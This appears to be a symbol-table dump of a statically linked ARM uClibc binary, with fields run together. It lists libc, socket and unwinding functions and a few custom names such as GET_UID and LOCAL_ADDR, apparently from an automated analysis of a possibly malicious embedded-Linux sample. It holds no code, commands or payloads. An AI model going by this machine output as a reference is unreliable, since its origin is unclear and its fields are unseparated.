                  $d.symtab0x116d40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x118ec0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1cf280NOTYPE<unknown>DEFAULT4
                  $d.symtab0x119240NOTYPE<unknown>DEFAULT2
                  $d.symtab0x119900NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11a040NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11a480NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11a8c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11b000NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11b440NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11b8c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11bd00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11c100NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11c800NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11ccc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11d500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11d940NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11e040NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11e500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11ed80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11f200NOTYPE<unknown>DEFAULT2
                  $d.symtab0x11f640NOTYPE<unknown>DEFAULT2
                  $d.symtab0x128f80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260d40NOTYPE<unknown>DEFAULT13
                  $d.symtab0x12a400NOTYPE<unknown>DEFAULT2
                  $d.symtab0x12dfc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x132a00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x132f40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x134100NOTYPE<unknown>DEFAULT2
                  $d.symtab0x260ec0NOTYPE<unknown>DEFAULT13
                  $d.symtab0x134c40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1357c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1363c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x136e00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x261040NOTYPE<unknown>DEFAULT13
                  $d.symtab0x2619c0NOTYPE<unknown>DEFAULT13
                  $d.symtab0x137880NOTYPE<unknown>DEFAULT2
                  $d.symtab0x138580NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1394c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x13a3c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1da940NOTYPE<unknown>DEFAULT4
                  $d.symtab0x13aec0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x261b00NOTYPE<unknown>DEFAULT13
                  $d.symtab0x13c340NOTYPE<unknown>DEFAULT2
                  $d.symtab0x142500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x146200NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1480c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x149380NOTYPE<unknown>DEFAULT2
                  $d.symtab0x149500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x149e00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14a700NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14b000NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14cec0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14da00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14e000NOTYPE<unknown>DEFAULT2
                  $d.symtab0x14e540NOTYPE<unknown>DEFAULT2
                  $d.symtab0x152000NOTYPE<unknown>DEFAULT2
                  $d.symtab0x261c80NOTYPE<unknown>DEFAULT13
                  $d.symtab0x153880NOTYPE<unknown>DEFAULT2
                  $d.symtab0x158a80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x159640NOTYPE<unknown>DEFAULT2
                  $d.symtab0x159e40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15a140NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15a940NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15b0c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15b4c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15bb00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15c500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15cdc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15d180NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15d580NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15db00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15df00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15e300NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15e8c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15ed00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15f380NOTYPE<unknown>DEFAULT2
                  $d.symtab0x15fc80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1601c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x160940NOTYPE<unknown>DEFAULT2
                  $d.symtab0x161740NOTYPE<unknown>DEFAULT2
                  $d.symtab0x165240NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1665c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x169800NOTYPE<unknown>DEFAULT2
                  $d.symtab0x16ddc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x16fc00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x171180NOTYPE<unknown>DEFAULT2
                  $d.symtab0x261e00NOTYPE<unknown>DEFAULT13
                  $d.symtab0x261dc0NOTYPE<unknown>DEFAULT13
                  $d.symtab0x1720c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x17c100NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1de800NOTYPE<unknown>DEFAULT4
                  $d.symtab0x181240NOTYPE<unknown>DEFAULT2
                  $d.symtab0x184d40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x186100NOTYPE<unknown>DEFAULT2
                  $d.symtab0x18c580NOTYPE<unknown>DEFAULT2
                  $d.symtab0x18d380NOTYPE<unknown>DEFAULT2
                  $d.symtab0x18e280NOTYPE<unknown>DEFAULT2
                  $d.symtab0x18f140NOTYPE<unknown>DEFAULT2
                  $d.symtab0x191500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x192440NOTYPE<unknown>DEFAULT2
                  $d.symtab0x192ac0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1931c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x195580NOTYPE<unknown>DEFAULT2
                  $d.symtab0x195b80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x196680NOTYPE<unknown>DEFAULT2
                  $d.symtab0x197500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x197940NOTYPE<unknown>DEFAULT2
                  $d.symtab0x198d80NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19ac00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19bf40NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19cbc0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19d900NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19e9c0NOTYPE<unknown>DEFAULT2
                  $d.symtab0x19f500NOTYPE<unknown>DEFAULT2
                  $d.symtab0x2c0NOTYPE<unknown>DEFAULT21
                  $d.symtab0x4c0NOTYPE<unknown>DEFAULT21
                  $d.symtab0x530NOTYPE<unknown>DEFAULT21
                  $d.symtab0x1add00NOTYPE<unknown>DEFAULT2
                  $d.symtab0x1b7780NOTYPE<unknown>DEFAULT2
                  $d.symtab0x580NOTYPE<unknown>DEFAULT21
                  $d.symtab0x00NOTYPE<unknown>DEFAULT23
                  $d.symtab0x23c0NOTYPE<unknown>DEFAULT21
                  $d.symtab0xe390NOTYPE<unknown>DEFAULT23
                  $d.symtab0x261d40NOTYPE<unknown>DEFAULT13
                  $d.symtab0x1db380NOTYPE<unknown>DEFAULT4
                  C.11.5548.symtab0x1db0012OBJECT<unknown>DEFAULT4
                  C.5.4638.symtab0x1cdbc12OBJECT<unknown>DEFAULT4
                  C.5.5083.symtab0x1ce5c24OBJECT<unknown>DEFAULT4
                  C.6.4639.symtab0x1cdb012OBJECT<unknown>DEFAULT4
                  C.7.4640.symtab0x1cda412OBJECT<unknown>DEFAULT4
                  C.7.5370.symtab0x1db0c12OBJECT<unknown>DEFAULT4
                  C.7.6078.symtab0x1ce7412OBJECT<unknown>DEFAULT4
                  C.7.6109.symtab0x1de5c12OBJECT<unknown>DEFAULT4
                  C.7.6182.symtab0x1de3812OBJECT<unknown>DEFAULT4
                  C.8.6110.symtab0x1de5012OBJECT<unknown>DEFAULT4
                  C.9.6119.symtab0x1de4412OBJECT<unknown>DEFAULT4
                  GET_UID.symtab0x28e741OBJECT<unknown>DEFAULT14
                  LOCAL_ADDR.symtab0x28e704OBJECT<unknown>DEFAULT14
                  Laligned.symtab0x115d80NOTYPE<unknown>DEFAULT2
                  Llastword.symtab0x115f40NOTYPE<unknown>DEFAULT2
                  _Exit.symtab0xf9c8104FUNC<unknown>DEFAULT2
                  _GLOBAL_OFFSET_TABLE_.symtab0x260100OBJECT<unknown>HIDDEN12
                  _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  _Unwind_Complete.symtab0x1ab844FUNC<unknown>HIDDEN2
                  _Unwind_DeleteException.symtab0x1ab8844FUNC<unknown>HIDDEN2
                  _Unwind_ForcedUnwind.symtab0x1b83836FUNC<unknown>HIDDEN2
                  _Unwind_GetCFA.symtab0x1ab7c8FUNC<unknown>HIDDEN2
                  _Unwind_GetDataRelBase.symtab0x1abc012FUNC<unknown>HIDDEN2
                  _Unwind_GetLanguageSpecificData.symtab0x1b85c68FUNC<unknown>HIDDEN2
                  _Unwind_GetRegionStart.symtab0x1bffc52FUNC<unknown>HIDDEN2
                  _Unwind_GetTextRelBase.symtab0x1abb412FUNC<unknown>HIDDEN2
                  _Unwind_RaiseException.symtab0x1b7cc36FUNC<unknown>HIDDEN2
                  _Unwind_Resume.symtab0x1b7f036FUNC<unknown>HIDDEN2
                  _Unwind_Resume_or_Rethrow.symtab0x1b81436FUNC<unknown>HIDDEN2
                  _Unwind_VRS_Get.symtab0x1aae476FUNC<unknown>HIDDEN2
                  _Unwind_VRS_Pop.symtab0x1b0fc324FUNC<unknown>HIDDEN2
                  _Unwind_VRS_Set.symtab0x1ab3076FUNC<unknown>HIDDEN2
                  _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __C_ctype_b.symtab0x261d44OBJECT<unknown>DEFAULT13
                  __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __C_ctype_b_data.symtab0x1db38768OBJECT<unknown>DEFAULT4
                  __EH_FRAME_BEGIN__.symtab0x260000OBJECT<unknown>DEFAULT7
                  __FRAME_END__.symtab0x260000OBJECT<unknown>DEFAULT7
                  __GI___C_ctype_b.symtab0x261d44OBJECT<unknown>HIDDEN13
                  __GI___close.symtab0x14970100FUNC<unknown>HIDDEN2
                  __GI___close_nocancel.symtab0x1495424FUNC<unknown>HIDDEN2
                  __GI___ctype_b.symtab0x261d84OBJECT<unknown>HIDDEN13
                  __GI___errno_location.symtab0x1021032FUNC<unknown>HIDDEN2
                  __GI___fcntl_nocancel.symtab0xf83c152FUNC<unknown>HIDDEN2
                  __GI___fgetc_unlocked.symtab0x184ec300FUNC<unknown>HIDDEN2
                  __GI___glibc_strerror_r.symtab0x117d824FUNC<unknown>HIDDEN2
                  __GI___libc_close.symtab0x14970100FUNC<unknown>HIDDEN2
                  __GI___libc_fcntl.symtab0xf8d4244FUNC<unknown>HIDDEN2
                  __GI___libc_open.symtab0x14a00100FUNC<unknown>HIDDEN2
                  __GI___libc_read.symtab0x14b20100FUNC<unknown>HIDDEN2
                  __GI___libc_write.symtab0x14a90100FUNC<unknown>HIDDEN2
                  __GI___open.symtab0x14a00100FUNC<unknown>HIDDEN2
                  __GI___open_nocancel.symtab0x149e424FUNC<unknown>HIDDEN2
                  __GI___read.symtab0x14b20100FUNC<unknown>HIDDEN2
                  __GI___read_nocancel.symtab0x14b0424FUNC<unknown>HIDDEN2
                  __GI___uClibc_fini.symtab0x14d38124FUNC<unknown>HIDDEN2
                  __GI___uClibc_init.symtab0x14e0888FUNC<unknown>HIDDEN2
                  __GI___write.symtab0x14a90100FUNC<unknown>HIDDEN2
                  __GI___write_nocancel.symtab0x14a7424FUNC<unknown>HIDDEN2
                  __GI___xpg_strerror_r.symtab0x117f0268FUNC<unknown>HIDDEN2
                  __GI__exit.symtab0xf9c8104FUNC<unknown>HIDDEN2
                  __GI_abort.symtab0x132fc296FUNC<unknown>HIDDEN2
                  __GI_accept.symtab0x11998116FUNC<unknown>HIDDEN2
                  __GI_bind.symtab0x11a0c68FUNC<unknown>HIDDEN2
                  __GI_brk.symtab0x1961c88FUNC<unknown>HIDDEN2
                  __GI_close.symtab0x14970100FUNC<unknown>HIDDEN2
                  __GI_closedir.symtab0xfdd4272FUNC<unknown>HIDDEN2
                  __GI_config_close.symtab0x164b052FUNC<unknown>HIDDEN2
                  __GI_config_open.symtab0x164e472FUNC<unknown>HIDDEN2
                  __GI_config_read.symtab0x16188808FUNC<unknown>HIDDEN2
                  __GI_connect.symtab0x11a94116FUNC<unknown>HIDDEN2
                  __GI_execve.symtab0x15b1064FUNC<unknown>HIDDEN2
                  __GI_exit.symtab0x13a48196FUNC<unknown>HIDDEN2
                  __GI_fclose.symtab0x16660816FUNC<unknown>HIDDEN2
                  __GI_fcntl.symtab0xf8d4244FUNC<unknown>HIDDEN2
                  __GI_fflush_unlocked.symtab0x18140940FUNC<unknown>HIDDEN2
                  __GI_fgetc.symtab0x17c30324FUNC<unknown>HIDDEN2
                  __GI_fgetc_unlocked.symtab0x184ec300FUNC<unknown>HIDDEN2
                  __GI_fgets.symtab0x17d74284FUNC<unknown>HIDDEN2
                  __GI_fgets_unlocked.symtab0x18618160FUNC<unknown>HIDDEN2
                  __GI_fopen.symtab0x1699032FUNC<unknown>HIDDEN2
                  __GI_fork.symtab0x1427c972FUNC<unknown>HIDDEN2
                  __GI_fputs_unlocked.symtab0x113f056FUNC<unknown>HIDDEN2
                  __GI_fseek.symtab0x198e036FUNC<unknown>HIDDEN2
                  __GI_fseeko64.symtab0x19904448FUNC<unknown>HIDDEN2
                  __GI_fstat.symtab0x15b50100FUNC<unknown>HIDDEN2
                  __GI_fwrite_unlocked.symtab0x11428188FUNC<unknown>HIDDEN2
                  __GI_getc_unlocked.symtab0x184ec300FUNC<unknown>HIDDEN2
                  __GI_getdtablesize.symtab0x15c5444FUNC<unknown>HIDDEN2
                  __GI_getegid.symtab0x15c8020FUNC<unknown>HIDDEN2
                  __GI_geteuid.symtab0x15c9420FUNC<unknown>HIDDEN2
                  __GI_getgid.symtab0x15ca820FUNC<unknown>HIDDEN2
                  __GI_getpagesize.symtab0x15cbc40FUNC<unknown>HIDDEN2
                  __GI_getpid.symtab0x146e072FUNC<unknown>HIDDEN2
                  __GI_getrlimit.symtab0x15ce456FUNC<unknown>HIDDEN2
                  __GI_getsockname.symtab0x11b0868FUNC<unknown>HIDDEN2
                  __GI_gettimeofday.symtab0x15d1c64FUNC<unknown>HIDDEN2
                  __GI_getuid.symtab0x15d5c20FUNC<unknown>HIDDEN2
                  __GI_inet_addr.symtab0x1192c40FUNC<unknown>HIDDEN2
                  __GI_inet_aton.symtab0x19154248FUNC<unknown>HIDDEN2
                  __GI_initstate_r.symtab0x13864248FUNC<unknown>HIDDEN2
                  __GI_ioctl.symtab0x19680224FUNC<unknown>HIDDEN2
                  __GI_isatty.symtab0x190b436FUNC<unknown>HIDDEN2
                  __GI_kill.symtab0xfa4456FUNC<unknown>HIDDEN2
                  __GI_listen.symtab0x11b9464FUNC<unknown>HIDDEN2
                  __GI_lseek64.symtab0x19ee4112FUNC<unknown>HIDDEN2
                  __GI_memchr.symtab0x18b70240FUNC<unknown>HIDDEN2
                  __GI_memcpy.symtab0x114f04FUNC<unknown>HIDDEN2
                  __GI_memmove.symtab0x115004FUNC<unknown>HIDDEN2
                  __GI_mempcpy.symtab0x19dd036FUNC<unknown>HIDDEN2
                  __GI_memrchr.symtab0x18c60224FUNC<unknown>HIDDEN2
                  __GI_memset.symtab0x11510156FUNC<unknown>HIDDEN2
                  __GI_mmap.symtab0x15970124FUNC<unknown>HIDDEN2
                  __GI_mremap.symtab0x15d7068FUNC<unknown>HIDDEN2
                  __GI_munmap.symtab0x15db464FUNC<unknown>HIDDEN2
                  __GI_nanosleep.symtab0x15e3496FUNC<unknown>HIDDEN2
                  __GI_open.symtab0x14a00100FUNC<unknown>HIDDEN2
                  __GI_opendir.symtab0xffb4196FUNC<unknown>HIDDEN2
                  __GI_raise.symtab0x14728240FUNC<unknown>HIDDEN2
                  __GI_random.symtab0x1343c164FUNC<unknown>HIDDEN2
                  __GI_random_r.symtab0x136fc144FUNC<unknown>HIDDEN2
                  __GI_rawmemchr.symtab0x19df4176FUNC<unknown>HIDDEN2
                  __GI_read.symtab0x14b20100FUNC<unknown>HIDDEN2
                  __GI_readdir.symtab0x10128232FUNC<unknown>HIDDEN2
                  __GI_readdir64.symtab0x1609c236FUNC<unknown>HIDDEN2
                  __GI_recv.symtab0x11c18112FUNC<unknown>HIDDEN2
                  __GI_recvfrom.symtab0x11cd0136FUNC<unknown>HIDDEN2
                  __GI_remove.symtab0x10264100FUNC<unknown>HIDDEN2
                  __GI_rmdir.symtab0x15e9464FUNC<unknown>HIDDEN2
                  __GI_sbrk.symtab0x15ed4108FUNC<unknown>HIDDEN2
                  __GI_select.symtab0xfb04132FUNC<unknown>HIDDEN2
                  __GI_send.symtab0x11d9c112FUNC<unknown>HIDDEN2
                  __GI_sendto.symtab0x11e58136FUNC<unknown>HIDDEN2
                  __GI_setsid.symtab0xfb8864FUNC<unknown>HIDDEN2
                  __GI_setsockopt.symtab0x11ee072FUNC<unknown>HIDDEN2
                  __GI_setstate_r.symtab0x1395c236FUNC<unknown>HIDDEN2
                  __GI_sigaction.symtab0x15a18136FUNC<unknown>HIDDEN2
                  __GI_sigprocmask.symtab0x15f40140FUNC<unknown>HIDDEN2
                  __GI_sleep.symtab0x14818300FUNC<unknown>HIDDEN2
                  __GI_socket.symtab0x11f2868FUNC<unknown>HIDDEN2
                  __GI_sprintf.symtab0x102c852FUNC<unknown>HIDDEN2
                  __GI_srandom_r.symtab0x1378c216FUNC<unknown>HIDDEN2
                  __GI_stat.symtab0xfbc8100FUNC<unknown>HIDDEN2
                  __GI_strchr.symtab0x18d40240FUNC<unknown>HIDDEN2
                  __GI_strchrnul.symtab0x18e30236FUNC<unknown>HIDDEN2
                  __GI_strcmp.symtab0x18b5028FUNC<unknown>HIDDEN2
                  __GI_strcoll.symtab0x18b5028FUNC<unknown>HIDDEN2
                  __GI_strcspn.symtab0x18f1c68FUNC<unknown>HIDDEN2
                  __GI_strlen.symtab0x115b096FUNC<unknown>HIDDEN2
                  __GI_strnlen.symtab0x11610204FUNC<unknown>HIDDEN2
                  __GI_strpbrk.symtab0x1907464FUNC<unknown>HIDDEN2
                  __GI_strrchr.symtab0x18f6080FUNC<unknown>HIDDEN2
                  __GI_strspn.symtab0x18fb076FUNC<unknown>HIDDEN2
                  __GI_strstr.symtab0x116dc252FUNC<unknown>HIDDEN2
                  __GI_strtok.symtab0x118fc48FUNC<unknown>HIDDEN2
                  __GI_strtok_r.symtab0x18ffc120FUNC<unknown>HIDDEN2
                  __GI_sysconf.symtab0x13c581572FUNC<unknown>HIDDEN2
                  __GI_tcgetattr.symtab0x190d8124FUNC<unknown>HIDDEN2
                  __GI_time.symtab0xfc2c48FUNC<unknown>HIDDEN2
                  __GI_times.symtab0x15fcc20FUNC<unknown>HIDDEN2
                  __GI_unlink.symtab0x15fe064FUNC<unknown>HIDDEN2
                  __GI_vsnprintf.symtab0x102fc208FUNC<unknown>HIDDEN2
                  __GI_wait4.symtab0x1976056FUNC<unknown>HIDDEN2
                  __GI_waitpid.symtab0x16020124FUNC<unknown>HIDDEN2
                  __GI_wcrtomb.symtab0x1652c84FUNC<unknown>HIDDEN2
                  __GI_wcsnrtombs.symtab0x165a4188FUNC<unknown>HIDDEN2
                  __GI_wcsrtombs.symtab0x1658036FUNC<unknown>HIDDEN2
                  __GI_write.symtab0x14a90100FUNC<unknown>HIDDEN2
                  __JCR_END__.symtab0x2600c0OBJECT<unknown>DEFAULT11
                  __JCR_LIST__.symtab0x2600c0OBJECT<unknown>DEFAULT11
                  ___Unwind_ForcedUnwind.symtab0x1b83836FUNC<unknown>HIDDEN2
                  ___Unwind_RaiseException.symtab0x1b7cc36FUNC<unknown>HIDDEN2
                  ___Unwind_Resume.symtab0x1b7f036FUNC<unknown>HIDDEN2
                  ___Unwind_Resume_or_Rethrow.symtab0x1b81436FUNC<unknown>HIDDEN2
                  __adddf3.symtab0x1a0a4784FUNC<unknown>HIDDEN2
                  __aeabi_cdcmpeq.symtab0x1aa0024FUNC<unknown>HIDDEN2
                  __aeabi_cdcmple.symtab0x1aa0024FUNC<unknown>HIDDEN2
                  __aeabi_cdrcmple.symtab0x1a9e452FUNC<unknown>HIDDEN2
                  __aeabi_d2uiz.symtab0x1aa9084FUNC<unknown>HIDDEN2
                  __aeabi_dadd.symtab0x1a0a4784FUNC<unknown>HIDDEN2
                  __aeabi_dcmpeq.symtab0x1aa1824FUNC<unknown>HIDDEN2
                  __aeabi_dcmpge.symtab0x1aa6024FUNC<unknown>HIDDEN2
                  __aeabi_dcmpgt.symtab0x1aa7824FUNC<unknown>HIDDEN2
                  __aeabi_dcmple.symtab0x1aa4824FUNC<unknown>HIDDEN2
                  __aeabi_dcmplt.symtab0x1aa3024FUNC<unknown>HIDDEN2
                  __aeabi_ddiv.symtab0x1a744524FUNC<unknown>HIDDEN2
                  __aeabi_dmul.symtab0x1a4b4656FUNC<unknown>HIDDEN2
                  __aeabi_drsub.symtab0x1a0980FUNC<unknown>HIDDEN2
                  __aeabi_dsub.symtab0x1a0a0788FUNC<unknown>HIDDEN2
                  __aeabi_f2d.symtab0x1a40064FUNC<unknown>HIDDEN2
                  __aeabi_i2d.symtab0x1a3d840FUNC<unknown>HIDDEN2
                  __aeabi_idiv.symtab0x19f540FUNC<unknown>HIDDEN2
                  __aeabi_idivmod.symtab0x1a08024FUNC<unknown>HIDDEN2
                  __aeabi_l2d.symtab0x1a45496FUNC<unknown>HIDDEN2
                  __aeabi_read_tp.symtab0x15ac08FUNC<unknown>DEFAULT2
                  __aeabi_ui2d.symtab0x1a3b436FUNC<unknown>HIDDEN2
                  __aeabi_uidiv.symtab0xf7140FUNC<unknown>HIDDEN2
                  __aeabi_uidivmod.symtab0xf81024FUNC<unknown>HIDDEN2
                  __aeabi_ul2d.symtab0x1a440116FUNC<unknown>HIDDEN2
                  __aeabi_unwind_cpp_pr0.symtab0x1b7988FUNC<unknown>HIDDEN2
                  __aeabi_unwind_cpp_pr1.symtab0x1b7908FUNC<unknown>HIDDEN2
                  __aeabi_unwind_cpp_pr2.symtab0x1b7888FUNC<unknown>HIDDEN2
                  __app_fini.symtab0x268d84OBJECT<unknown>HIDDEN14
                  __atexit_lock.symtab0x261b024OBJECT<unknown>DEFAULT13
                  __bss_end__.symtab0x292e80NOTYPE<unknown>DEFAULTSHN_ABS
                  __bss_start.symtab0x262c40NOTYPE<unknown>DEFAULTSHN_ABS
                  __bss_start__.symtab0x262c40NOTYPE<unknown>DEFAULTSHN_ABS
                  __check_one_fd.symtab0x14db484FUNC<unknown>DEFAULT2
                  __close.symtab0x14970100FUNC<unknown>DEFAULT2
                  __close_nocancel.symtab0x1495424FUNC<unknown>DEFAULT2
                  __cmpdf2.symtab0x1a960132FUNC<unknown>HIDDEN2
                  __ctype_b.symtab0x261d84OBJECT<unknown>DEFAULT13
                  __curbrk.symtab0x28e6c4OBJECT<unknown>HIDDEN14
                  __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __data_start.symtab0x260b80NOTYPE<unknown>DEFAULT13
                  __default_rt_sa_restorer.symtab0x15ab80FUNC<unknown>DEFAULT2
                  __default_sa_restorer.symtab0x15aac0FUNC<unknown>DEFAULT2
                  __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __div0.symtab0xf82820FUNC<unknown>HIDDEN2
                  __divdf3.symtab0x1a744524FUNC<unknown>HIDDEN2
                  __divsi3.symtab0x19f54300FUNC<unknown>HIDDEN2
                  __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                  __do_global_dtors_aux_fini_array_entry.symtab0x260080OBJECT<unknown>DEFAULT10
                  __end__.symtab0x292e80NOTYPE<unknown>DEFAULTSHN_ABS
                  __environ.symtab0x268d04OBJECT<unknown>DEFAULT14
                  __eqdf2.symtab0x1a960132FUNC<unknown>HIDDEN2
                  __errno_location.symtab0x1021032FUNC<unknown>DEFAULT2
                  __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __exidx_end.symtab0x1e0000NOTYPE<unknown>DEFAULTSHN_ABS
                  __exidx_start.symtab0x1dee00NOTYPE<unknown>DEFAULTSHN_ABS
                  __exit_cleanup.symtab0x263804OBJECT<unknown>HIDDEN14
                  __extendsfdf2.symtab0x1a40064FUNC<unknown>HIDDEN2
                  __fcntl_nocancel.symtab0xf83c152FUNC<unknown>DEFAULT2
                  __fgetc_unlocked.symtab0x184ec300FUNC<unknown>DEFAULT2
                  __fini_array_end.symtab0x2600c0NOTYPE<unknown>HIDDEN10
                  __fini_array_start.symtab0x260080NOTYPE<unknown>HIDDEN10
                  __fixunsdfsi.symtab0x1aa9084FUNC<unknown>HIDDEN2
                  __floatdidf.symtab0x1a45496FUNC<unknown>HIDDEN2
                  __floatsidf.symtab0x1a3d840FUNC<unknown>HIDDEN2
                  __floatundidf.symtab0x1a440116FUNC<unknown>HIDDEN2
                  __floatunsidf.symtab0x1a3b436FUNC<unknown>HIDDEN2
                  __fork.symtab0x1427c972FUNC<unknown>DEFAULT2
                  __fork_generation_pointer.symtab0x292b44OBJECT<unknown>HIDDEN14
                  __fork_handlers.symtab0x292b84OBJECT<unknown>HIDDEN14
                  __fork_lock.symtab0x263844OBJECT<unknown>HIDDEN14
                  __frame_dummy_init_array_entry.symtab0x260040OBJECT<unknown>DEFAULT9
                  __gedf2.symtab0x1a950148FUNC<unknown>HIDDEN2
                  __getdents.symtab0x15bb4160FUNC<unknown>HIDDEN2
                  __getdents64.symtab0x19798328FUNC<unknown>HIDDEN2
                  __getpagesize.symtab0x15cbc40FUNC<unknown>DEFAULT2
                  __getpid.symtab0x146e072FUNC<unknown>DEFAULT2
                  __glibc_strerror_r.symtab0x117d824FUNC<unknown>DEFAULT2
                  __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                  __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __gnu_Unwind_ForcedUnwind.symtab0x1af3c28FUNC<unknown>HIDDEN2
                  __gnu_Unwind_RaiseException.symtab0x1b024184FUNC<unknown>HIDDEN2
                  __gnu_Unwind_Restore_VFP.symtab0x1b7bc0FUNC<unknown>HIDDEN2
                  __gnu_Unwind_Resume.symtab0x1afb8108FUNC<unknown>HIDDEN2
                  __gnu_Unwind_Resume_or_Rethrow.symtab0x1b0dc32FUNC<unknown>HIDDEN2
                  __gnu_Unwind_Save_VFP.symtab0x1b7c40FUNC<unknown>HIDDEN2
                  __gnu_unwind_execute.symtab0x1b8a01812FUNC<unknown>HIDDEN2
                  __gnu_unwind_frame.symtab0x1bfb472FUNC<unknown>HIDDEN2
                  __gnu_unwind_pr_common.symtab0x1b2401352FUNC<unknown>DEFAULT2
                  __gtdf2.symtab0x1a950148FUNC<unknown>HIDDEN2
                  __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                  __init_array_end.symtab0x260080NOTYPE<unknown>HIDDEN9
                  __init_array_start.symtab0x260040NOTYPE<unknown>HIDDEN9
                  __ledf2.symtab0x1a958140FUNC<unknown>HIDDEN2
                  __libc_accept.symtab0x11998116FUNC<unknown>DEFAULT2
                  __libc_close.symtab0x14970100FUNC<unknown>DEFAULT2
                  __libc_connect.symtab0x11a94116FUNC<unknown>DEFAULT2
                  __libc_disable_asynccancel.symtab0x14b90136FUNC<unknown>HIDDEN2
                  __libc_enable_asynccancel.symtab0x14c18220FUNC<unknown>HIDDEN2
                  __libc_errno.symtab0x04TLS<unknown>HIDDEN8
                  __libc_fcntl.symtab0xf8d4244FUNC<unknown>DEFAULT2
                  __libc_fork.symtab0x1427c972FUNC<unknown>DEFAULT2
                  __libc_h_errno.symtab0x44TLS<unknown>HIDDEN8
                  __libc_multiple_threads.symtab0x292bc4OBJECT<unknown>HIDDEN14
                  __libc_nanosleep.symtab0x15e3496FUNC<unknown>DEFAULT2
                  __libc_open.symtab0x14a00100FUNC<unknown>DEFAULT2
                  __libc_read.symtab0x14b20100FUNC<unknown>DEFAULT2
                  __libc_recv.symtab0x11c18112FUNC<unknown>DEFAULT2
                  __libc_recvfrom.symtab0x11cd0136FUNC<unknown>DEFAULT2
                  __libc_select.symtab0xfb04132FUNC<unknown>DEFAULT2
                  __libc_send.symtab0x11d9c112FUNC<unknown>DEFAULT2
